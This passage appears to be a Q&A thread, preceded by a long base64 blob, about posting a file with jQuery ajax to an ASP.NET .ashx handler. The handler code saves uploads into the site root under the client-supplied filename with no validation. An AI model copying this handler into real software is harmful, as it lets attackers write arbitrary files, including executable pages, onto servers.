+Rrhc/mOLtMrvRolEUQ/LXFhzQi7auZlwRAV6fouIvaTTNCETIC5NkY30JIctYCgPaJU+iss2rCZ1OiUANQkZB4prUM0mny/LxZmW5mqfDoV58pX9giJ/xLBJ4ESsffDKrCi4hOEoJwhDQNTWmn8RI9xq74i2WZxxrWL0QBODoMTYIowYJBt3Gho3I0dZ0/dmVXG58h62VuwhVuYCYEmBpjtBUYIA+hcvCtjPKAA2ldjonU5CU1ACW25D5qrUE2alvd9M+JMkfuOqNZohLHEifv4kfyZodiUMdI6kN6ZabVA1qLaiN0JMy8zGl1h5gGLDC5uKHODySmZQoAK5tu27eUS8U/BmeI0wBOjFRbJjNoopapoHQ8VMHijylHLaCbZVDWOllPT2ANG56643IdQZ4GA4+gma2UxyrEua2SJbuFwUkQE3V642RgIijCYCV3FYMhL6CuTE//KMwmn8Bu2yARqag89eYeqGipBEQ7pSWvD0A6toI/YPM9Ti6UbeCXefLsHskRl2t48XAnnoAw3BA5SDSFUtpcNaek5Qmr27B8TYSTVI6gr3j4s5LCZ6b53Ej+YsS3uFZgOLQ23qTkiO7RohAyrDQybGRWltea14zGI6j82ZmdWN2CDCIVYP7UkVwY4vsb+fQjIDYVzNhSPjRa5ftIY0IILtmDVbdInHYrFO48qC8vxQLk5KYingcR4MZyZggpH3Ic0QNMWR8PuoQ2PlZw0X8N9gCVNGKZlSikxIAYGnLmXcaTT0BwLuaLhwAExwPcxuAEZEAPKejrkEKEraUZX3sT/T28ZgHUbc/P08/0UICks1yilG+Mi5SCab2YrvFq6aYU4LoK4mVm6u4K4Zvb0PoV0rVS/wj2OTn2N14lck+11PH5pBrbjAa5jBU5rgWhndE5yXMfjrJjuaGBrKb1yDIbVTIDZIAoX9I6BNwiDlIPOXgsD4RieBNkltVAGtCnRtlmo5biKaCKIHRNAx3AnZVBEHAgD+DaIYRqUywFptW0ZFWE6kO6MayJ7AB9LfA8Ds0cbigmOYWp3TzoMZpnW0iIM3/rmlNWO1ugrj8CwkxmZUvIMep/3wosJy7b0kQg6jJmhWOEotRBHZ92gAJo60FHUjp4qHP0XsdCZJFl1/LWNPok6hZcfC49FDga+Cl6fiJcnVbI+68Zt3EwQOZ5QgRsYg6gJ70bAifOQUq05ADTIhHZMaO7osusBuneRC6ih/10RWt03SAa1r/W3YoiB2HtlmATn905iAA61tw1iyAQcuAE0GCaW/miI36fsqIpUpX+vW96z1gp7Bgh6ygRmQiNmTKZPwzRJwiHjhhhi0ZQp07ds2b5o0SwuU7Yvo756G6NlVCaSpEh9+zzuW7Yx5EaX9KLNjCayZsZ6LemJXJlxpsuWKi+urAdtGbSJLut5FKhxWUiM0TAGhQYt41Wjy0TqZNqSJMZ6LklOPRlUI9quNqm6vNh2atu4F5W5Veo2VEe8U0Etw3sxlLJQfPsqO9VxGahQgKMJpkg3L12KLpWBiqHiRoAVkjQNmyTGcgwYKgxkBmBaRQAAMSZlMhAjgP8B1QZUmBbjkeq+qyw/8v6YiV7L3MpuxCAe43gMHJ9jiMlEkZiYMMTF3CAOUQwliGFwQCRmMvJKYj5wDIsGzeTRjBnJmt83tP1GuknZo+WtjOxVeiqJ7ZupLBN11N3wEBrEXEVTRytJFpIyR0EzVE4HqvQgSVdRGFJGQS1lHkn3ubeVVUkl5VFaG0EDlIkfIaUeNEatB5ZFFTYoHE5H3WYTfVL1pF5LLab1kU5LnSQWXEttVdeRcD31VmRyXTTVY5FNVOREj7kVGGUdKWMKYnTxBQoolIkJx3EAqAADcpapsGYAtJn25puraXKDmSuYBoNqB8QwjHs0+XRVb/ZlAhX/oNDcgMYbbqBR3QErxLCCGAKGdsMkaBQXAxqaEDNMcZF+ZlAMYWgCXHAURarJZDNq9GKGGwH1EVn6mCdibiJOqdtAFInY4nmSCeTTnx2F6V5JH5FonqztqUeXUrnZ1CJSM+lDIYL0rQeriiTJmuy17B3InrO5hTvStdeGNdKGM2JklVGSHeXfSjE+2ZKRU5H1ZIMaUWQXlPe5O9dc9x12mFJ8PaZUv9CAUuXCWFKU2JdhRqyJMjEAsIIKBwAQm5lxcgznmwY4F8bGb6amgsU4EGNRSEHqFKhvUGG0EhqZZFKHzTaDGupyrl0KQACTflapnmhmkkYMHjlW0n9vOFff/601WTWWjxrJqp697ImkdEeTsJYJMclouU9KgR6mDzEzN4gUU/GhhVay81VIa4Vv2/22hWPJ65JVcF1FtXxTJVXSWOYRjNZ8rSIOtXBWydrgfUa117c+97FLoVUVhfgg5H3LtzZSkBsuH1JInSd46KH7q7qYkW0ZJpawA2YKYIlhGQo0pphyCu6VOQqnZRd3rPHHbh7nXWoWp4amasdPJLmyMOuTiU06nVddD2e04UaimBQkoA3IGcAxnhunZgDzQIe2GuTqRbuMfxxZ1KpYwZFFdlv0pNdW/Rh5qIylLoWDMDhHP4Nri0oQ5JjnaKI5SdmK1UakERfNaj3T4tCqvv/VLazQZ3Fve9GK7vcicK0KaskyEQavZq3BJUVW88HcSFJYH6y0kEMOskjfptagHNrIcPPRlekukrnJhA4auKuSKQoTmTApTGFcAtOWELMwiFFGMIDBwQEMsIIAwMBOANDTCsoHJzeZxgDeuYGdMmYmjZkmVB4xStkSxKN6OGd+TClOdaoDg0OdoWaYQEOl0GCQPBJHTxYDQPnEqBpKGWtdyiBG2gQ2JSJd0HBsqRysmEIiigTJJmtzDDEIMgnvXIQexXjOI4cBoAGKQTlpsBmqhLOWs5FubJHDCEz6A7fCPSVDf7tfCU/SQbsRTkbA1Ai03naSGCUOmc6CSqyQecL/Xc1qVi7kkK78hToHKeUxDsqm6gRnHm2GKEtJFNMpKHMe2oEinVOEIpj4YsV4AkYxFAkDxsoIsjJ+rGNAUw1FyrRPRAKUHpPpEFRUpKLf9AYaOMgEJrh3BjfEIHw20NMNDFAdQdbMZt4TpKRigL5DbiwGmfCKwLZmEQ9NZSVvKRzXQGShetRvJ5vM0Eo04h1B/ocYYBskDoJaINjZSGlbo4tRgMMsn5BoVD4MHVOSpZNYrcdFFakbi6LJm42QDT/myirWwAIrHVnIKeLqELJY9BEKgQQ/HtTX5ISIEwgaLoZjkSTfeIk6pECJmxNpGFLCFA2JhUkwEqOYXhoEpnpG/yMNB2BjP+GUGpOZZrKowoFp8imbOKFKMu4jSX94Mwy6qGQlx7lBJtyAiTck6g1o6IEb8hg+Q57WpLDMxBv+aB1E4gm1zjFJlR6IGw1Z8ChSuUjlDPqd/ujDoMay17Vu85xMLMQ53nFMgmY2s5ZIt0+eDItIMKI/Y83vJVf7SGnRuyNsGWslwGkhT1SC1Mc192XuOS9NXJSSGOlDhTDD33+1BdqtehW0gBpwuXojlgN5RV9d2eCqapq1rPH1rvZahkT2VTob2UhLqKSIYJCSiTQCjWNkDNkY2+gcMRwgNUHLLCJDI4nK3YYqRArKf+zbEuJkIgyvdIMbMjEETEQ0Z/+qdYMYspdF6+AxDGLABGuQvJw0TYJinIRmbjR5V6n4ZCtMW6BkXAdmgUDlPmTx11FWJcd2kY27YF7gdR1Djzg/ss6jhaQyhuFTZVCMM6AgBihGu5A88/nOzwkboPlMkTsnI9F//gSgw8YZijQ60HwO2yP/3OjRgg3SnyB0pyGpiUZ7hxh9LvWdIfln7+g50BRrNaf5nAyKUMw7lo60pjWVDE39Z9GvtnOvIz2MPwd6z6W2GWtY47SCpKHZaeDOAG8wBoksQxOWCcBk9xmbyMIpE9AQA21oYwCNWew1ABjDVvylTR21hGLbVUZQiXGDMHziyEC2N/eC/InUWgoHmNj/qHU0iseNDlKkx8GBJMJk0ImcxycxkVXb3PNIeTPntGHwDJQLwh3iTOLNdEalKnsq6pwhGwcGyYQmxtALHIRqgNuRFA62wORCEscGxgmfcWZ+qZ0zIAYHYDKabhB0jK5vj7Xduc8renSlF+fnS7+UzptudKbTnOkwcPrOjfP0oKepOGhCTs6//vTwLZ3sZId61/V0ADQFQE/Nc81sYyARaGSCjSV705pChu2O7d2kAEzNCjSGMhi8GAA3YJZk4AcWHOX4vMoQwxnS8AYxBFlREAVybtEA5D/mLHwJgSiRIxrR6HBn59QRaRs7eudMjJIy17XydDNBJ+vkcVJf36jP/0NqnTAUhwu0r04YGlAcn0Wq9JQiDhp8fHFJ3MAHPA6k5pUjHeqAtI/WR4P1z3D9Hrz2DNnzgffD74PvnwEi5Od+H9F/BvB3H/zcJ//4XyvI9zsf+/GHPPa9b//rpx/87Od+GIQB+CUZ9vWAAYZBD8RfD5gc92Hf/M0f5IGf9v1f8gGgA9KfA2IfH9WfGBiEUEUKRNwADsQWDEzCdByK93zG3GXCowzUiYFMtgHAJNSDpQhP8/QYaMSAJliEdywJjozF07zM4xGQ7HUU5gWZ5uVWGlRezfhADHhPQdzbakFUbuXMcoid4aHd2q3d0WndpTTAAdgAbnmU7N1AGqCWJv+EARqAwhugyXKAShpUyhJKguYtIWsIHdJIgs3QYUHEgGvdgCSkgUG8ARpVh0bdQA8QEvboGx1wz2od4REmyr0lSmpVYr5Z4hvQQURRYr5VHuZFlCPmliSKXvdsXm6pVh1s3r11YuU9Yr6BIihyDx1ooiSqYibQouipVi1+ohTW4iai4iqu4i4CWSqq1ifUgfMRUgPkUSIOAyFqAtIkXx/pVmRYG5yY2Gn80xi5yQGggTJMghe5hmrU2iHdQKLxS0cgCD0MSnDkhhj4gBhMwkMJkivqIimeAUSlVjc+YkRpHhp4j6JMYWo1n0/pSUTQ4SsdRxjAQHQsyrwJXahUign/woDTABnrHcpnYMInLMowUId3sKDN7JGAVEf5EZJIhYFGRYeTUYcBSIdrDBAhogEDGKIPGMT7aR4RIMoqYkIjrhZPplYubmIs7mQwEmUv4ltRCqMqWmRRRlRPaiKQeQKQNaJUOqUbpGIjQuW9NWInwuLm9eRSHpknwGIuhuW9FaNqcWVSFmW9IcoU7tuiFARqBRmReSSXVIw/4d01DpSL4cB/mBtpZJF3rCNmrMCgYFiTaAVcsKPadCBqhYEetqIj1qFqFURuYUIM9MDlVV5qBZll0mVleCMaXMZH5eMe1Z1BcJ7OHMArKcTGYU8iapRMosH4NYCA2MwbmFRuVgd1/0iHyVVHkCGfGerhslmKJlDUPwpizfAmamnkvlnkJFSmKYblL7aWUJIhFYpeJXrC5XmPT9pjFX6nTwLlkcXiZXqnagFk95ynKhZZkFUka2Xie14nXVYmkQGl6N2n91RhJToNQG6nR0FheNpMvd0iUyqKZ/6bzeibpcglFI7eDYDCiDzWPr3gQL1JGCzDMLTJF2WWN04FxZkUlFQJXDjGJKzKSnyb7MVAA2SCHhpZRO0bbsZoolQHbmleZ9pb6C1bcQDQuBVZzkQkzm3cxsEAJmiCcwgdJsDWvWGKpXiPjVqKalEHHTrpoYzgoWxUSQ5DddTWxZnjooTKzC0KRfZjzf/k5sAp4g30XHUsY3HY3JtWhw00gM0xAJ3O5A3QqQ0YgJ3OqQ3AwEXZ3J3m6UwKKs7RKaLa3JragKDO5Ew2AAP8KQMwAAwwwM/h3NUZYgNUqtDRngFcVJzmqaDukajSns1p1B5pFM5ZlJx26aPmqddlVBiGYUat6dUJnNNplGsQR2wch8AVB5mGGUlZ6IWCjG3gJYqFga5EA8XlwOo8STqKRMcNGABBFEQYmRs8J0R9Qgoax0/BQIJ2ZnfKKEQxn1+yoG761KIwQM10I+ttHhEgjRhw60beQCnKpSRQhxvUZAMoigFIyqFolHSk6Q3g4x+uaM1UyhtIgklRVLIVhAn/xsAZlNu2oYlrXKzBaZHPqEbGEB7FrsC45YmeYCwitVgXaWzgXZ0alVueZExorF3ghdGLddEWeqxsOMoBoAwXvQbh1WzOcmEWidTJCu0XjUbKBg36jGzQNoo4+tzVwUDIllsW/ezT5ixpGJzHPu3Ook/SPgrVctGmHscWIofKJAUxkEY2FqsLAoBfVoyLdejhDYyYVFtRqdtEDEp6QUPNKASBeqYniOKCyl5wxkAyyB5rkOVbcp53hkoyvEEWNccN4BwABFlySMcCckcPoM8bgEJqxYAbvGZGdSCmxBZq2ahPbUFCNgfrrdYkQNnCWgogHkekbAfa9d4NbMFD1JZx/4SBDPBeK8Xjw3oN6x3N8E6C03xN8LIeawQixMZh8RKvJLxBdBqvi1Iv8h6v9BLv1yhv8r7S8z5v9y7o9LZuHE4vblHvKy1b9joN+1LhHhqZi0rvfk4hEopiIGKC9+5hGkRHJiCE1xyuIL4Skt6WxOwL5NBJG12ohaaGxqzAI1kM2tKG3J2HU1RbmI2olhTDGwyOxEGEvlViveFMJUIhplykzZSwVH5CCoceyS3Hio0PqabBfzwUC5ocdbSBk9HJv1Iey1XmMFDuk/ldXBIHI9yA7+Uc7aFdlybHCSqHcjCbzegZ2DyHO+QKRShXUeTXRERI/XDVhYjLVaiEfpANoP+oxNVsi01AHEzAUZfhiLSkhI1lRUzYx1p9hLS4B3DQxLbMhFr8hHvsSBrnxFTYEcuAiyS9jJ+UjopcTYsIxbq0GVfJDMTxiuTIzIhajo0IltuqbQwOVNKwYGaNz8ZMQlGlzV1FSZHkGLVKRx7trUd5Zs5AaW8iqY3WWxt05oPKZQzIQJB9Bp4kh3OsxBagQSP4jCF5oRJTXnNgJhqc4ZGW7mkBUrlyhnXV2Zt1hCapY0foT09ADqn0xnYBC49cVf2IhU6UFldpS4rySGmh8bZkWbZwhU0ERz3YUVLUs1DgiEKtRW801x9/M8QNWFBERUsBCVGcRT2rBVXICm7Mc1f/vQxE44g898Q8r4pz3QuRNInAHMwSSUnAkJTapi3wiMwmx8ZkHd59mLKWXBianQf1zMxEdJRDFkeQ1QH7Hui/3YC+UVRufcIn9HS9EaK35qvs5nC+Ks2UDe9vOcZo5YoJMtlyDCxUc1KvDA6KBkdWYMs8u0zpnAX+9FDWJAvfLEh6jIiFmJnkMNMEcQiK2M9XZFANERgNXdO0TEtuTMuDhAgjf9OUOMsLWchTIN5WjdCBXdVR4DWxPDRGqxlciIRVo4R6DIk8g4Uk0UWGpOPBPInf8MWUIGvehbRIX0zNeNEYJc1F8IXCEFEtPcYkBIWxaOa+fUIyOB8eOWe2aiSR//l0Mnim51bkc4Ypb34Gy4HkplTcSe2DT00aNI2XWq3HI/3WqE2czTjGiJSKTlREn+DSepyOw33XRNSEAUvQFitJgxhFOZ0HGsuNLBlOhqgQMunPRLiQ5jwQ4uh1iDhLimwO5thKDp0QfSQVoUDX4JzQeoTQhCSFc93GiXSEcX3FVJXFWQRFFx+XedDUgTCLXsGVuhVVmikWXBjGVGAGQa2tmRAr24JyZsGGaqQBd6XjYWA4Vf8HB6+E6tbMrjXua0pmQhjj59nof5yemv6cCWrCFkzeZ6DWfVDMFgtEjTWSI5UQeo8OTbRPlejK38hHPG9IgcvIeQjRvkhoj8CKVf98hSxlk+WYSFF90NuMRXaF11ekY9ZUxJlzEH9jE9/gN7RwhJTgCImyObV19pYZMPScR9sIhIVIiIAFSVXBBUdUiVQQuoKUBHnrS25AK4dA62QYRpPoC1FtstqS9j6lxg0wgsXkLG2sneFh11xc8kF1DYJBQxg4zb6lARQ+J8sdyn94D7fW+hl6RnIM0gocH0OgVsVtlHdwV7xAyVfUxLOEWeKdCEVk2QuNUwmRqKS3FLZn0Ce5F8PBD+xY2p9NHJiF+xUjy4sLx3AdV1XNh2vHRauwuV/fR7LAhDNddrXkS91ktj5D0ANRjAtBk1Q4hlJUjdI4E3zMUC91dnARSk7/rRVUDEXDqYqzeASHIdOICEyrJxGTIIUYhDSH4p2bjEbzwIbFwMDJApRG4EVkGFdm30fH2ccy1AwsZwLnTncyyOO8OQdEmdoJM8d0VMqlnJFPQV1ELFC8VBt3mYdEYItKEElgLxCUMPgWS1e0F4s+84hUjOiDpApL6FAjMFntgl1yRDtmc0QWw4pJBHRvdAiDGIu/9MfntISbE0VLbQW33MhDJ4hl0xhyL1CLkBaztA1ppdlG1A+Z9Q2h6AjULNyvYPULCVaF/8/qvEihE1Glpyhfi86+9MperA0aLM+FdnKK3QlyZKPaOQdmR/2GOcgypMFV0wMavCgURnHOPNIk/xyHJKiSGGwBHhWH1yxHPKJhmhT9N0bKtDm73wMHT0zVQEADnnHXtsBPejQ/w8XI1L8969wQwu+LvniH859HGtBhBxZfB7LGK3nNRjPF2HTxQPTJTIyxVCnV+zfIe+V3q+AUPwsyV0TO6JgxQNRTpoyYJmKZMGVCI2bSpEwHHyrTlCnTpDcRlQ0buCzavn31Oi4TqEwkNI4c90WLtgzaPmUpo7VcyXGgypQtByoDJTEnNJAfo+mjt48eSGUCl5F0uXJmTJUmVXKcKQYGgAMAsAIwgFVFVq9ZD8ToeiNGjAMqygKIYTUGSZrRlEFTNnNZUriZ5nrUp4zsDb9hYvjFgf+GcBpJFGMEIBtY0kGCxMqKKbt4rQoxmgbWkxSYsxjPMcQY9jxsosFkOXcq01eP3tzWA/Uldbsv9tyV+lTaXJaynkffuV3KZalsKO7dLl2+XBa7nsnWHJEGJTY9Gr3jI4nDHYh8LnGie4PSgzY08/jmAol+3EeTXtSV61f63Dd+2euCjW4ADkMWx5bFaMqa7AYxcOBCDBliwOEGBAccIyKRUlpKJaWa6iian9azLajuZJuuIhzCIDAMHHAQI6ea6vnppQ1vIgkak1iqS66ZoGoJGjEC+OorFbrKMauu0FILtGHE2C9A/jiMK6663urujY48igmHTNwgLCGF0FDQL87/YoDhADHwIggvwgyIwYAtw9hvqwC3yAQHRoghSAwVDlhBSM5u2ELAALuMIZOdBNJnPWji2wsnuFKqqbVEU5IqKvikaq42uXpT7bjt6lnNpeZoSwpG1eCCixhQptNEjMMmQSMNiiRBI5NPDtIEM4IGijOuoUwaj9C5WGoPpQh360hFqVzSpK8hcyJtGEYCC80ih0AhraBhJpnIsyJluAGHN4gZaTeSVgSJUAvd206Zdy5MqbVMCPTM1g7TaHZVWk98CaQ4b2KKI0L3dU+kaCQDoCsdAfCR4IIFhkGT1qA5KAzM3p1QO59mtEuZSX7dC43TkvkElE8+ySmZ05ShCJQq/5X5BMsYbPCLsB6ONUvmM8OKjKG1YFgrBiuHIUblTNKwMsuycr5hGFDcoe0lklirTjm5fCUpttiCAgqo3YLlrVZwO6w3J9m+djG+gYZBwy/K+Ew728nYBi0/fKF8tCOobpqPUH3GDamlTDO5YYUbwiSpNTH8YigTSnjSpNrSJHpI1scPQhCHYRBd1Da8UzKO0QvnJoYlYiYRAw18X/qovoEyiewGLvhrdtbtwIMJJhmbi2pGZdKoSoWtDj44ZxhgEEMo4papSBNoNLFruI1grCvqTH590Yc20HBDEjd=">
```

I want to post to server by $.ajax and save to special directory and filename ,same asp:fileUplad.

Comment: post relevant code in question not external source

Answer (score 0):

Change submit to call ajax instead:

```
<input type="submit" value="Send" onclick="SendData(); return false;" />
```

Add script to handle the sending:

```
<script type="text/javascript">
    function SendData() {
        var fd = new FormData();
        fd.append('file', $('#imageInput')[0].files[0]);
        $.ajax({
            url: '/UploadImage.ashx',
            data: fd,
            processData: false,
            contentType: false,
            type: 'POST',
            success: function (data) {
                alert(data);
            }
        });
    }
</script>
```

Create .ashx handler that will handle the save:

```
public class UploadImage : IHttpHandler {

  public void ProcessRequest(HttpContext context) {
    var parser = new MultipartParser(context.Request.InputStream);
    if (parser.Success) {
      // use path that makes more sense - using root of your website + provided file name
      File.WriteAllBytes(Path.Combine(context.Server.MapPath("~/"), parser.Filename), parser.FileContents);
    }
  }

  public bool IsReusable {
    get { return false; }
  }
}
```

`MultipartParser` is opensource class - see http://multipartparser.codeplex.com/SourceControl/latest#MultipartParser.cs

For convenience also attached:

```
public class MultipartParser {
  public MultipartParser(Stream stream) {
    this.Parse(stream, Encoding.UTF8);
  }

  public MultipartParser(Stream stream, Encoding encoding) {
    this.Parse(stream, encoding);
  }

  private void Parse(Stream stream, Encoding encoding) {
    this.Success = false;

    // Read the stream into a byte array
    byte[] data = ToByteArray(stream);

    // Copy to a string for header parsing
    string content = encoding.GetString(data);

    // The first line should contain the delimiter
    int delimiterEndIndex = content.IndexOf("\r\n");

    if (delimiterEndIndex > -1) {
      string delimiter = content.Substring(0, content.IndexOf("\r\n"));

      // Look for Content-Type
      Regex re = new Regex(@"(?<=Content\-Type:)(.*?)(?=\r\n\r\n)");
      Match contentTypeMatch = re.Match(content);

      // Look for filename
      re = new Regex(@"(?<=filename\=\"")(.*?)(?=\"")");
      Match filenameMatch = re.Match(content);

      // Did we find the required values?
      if (contentTypeMatch.Success && filenameMatch.Success) {
        // Set properties
        this.ContentType = contentTypeMatch.Value.Trim();
        this.Filename = filenameMatch.Value.Trim();

        // Get the start & end indexes of the file contents
        int startIndex = contentTypeMatch.Index + contentTypeMatch.Length + "\r\n\r\n".Length;

        byte[] delimiterBytes = encoding.GetBytes("\r\n" + delimiter);
        int endIndex = IndexOf(data, delimiterBytes, startIndex);

        int contentLength = endIndex - startIndex;

        // Extract the file contents from the byte array
        byte[] fileData = new byte[contentLength];

        Buffer.BlockCopy(data, startIndex, fileData, 0, contentLength);

        this.FileContents = fileData;
        this.Success = true;
      }
    }
  }

  private int IndexOf(byte[] searchWithin, byte[] serachFor, int startIndex) {
    int index = 0;
    int startPos = Array.IndexOf(searchWithin, serachFor[0], startIndex);

    if (startPos != -1) {
      while ((startPos + index) < searchWithin.Length) {
        if (searchWithin[startPos + index] == serachFor[index]) {
          index++;
          if (index == serachFor.Length) {
            return startPos;
          }
        } else {
          startPos = Array.IndexOf<byte>(searchWithin, serachFor[0], startPos + index);
          if (startPos == -1) {
            return -1;
          }
          index = 0;
        }
      }
    }

    return -1;
  }

  private byte[] ToByteArray(Stream stream) {
    byte[] buffer = new byte[32768];
    using (MemoryStream ms = new MemoryStream()) {
      while (true) {
        int read = stream.Read(buffer, 0, buffer.Length);
        if (read <= 0)
          return ms.ToArray();
        ms.Write(buffer, 0, read);
      }
    }
  }

  public bool Success {
    get;
    private set;
  }

  public string ContentType {
    get;
    private set;
  }

  public string Filename {
    get;
    private set;
  }

  public byte[] FileContents {
    get;
    private set;
  }
}
```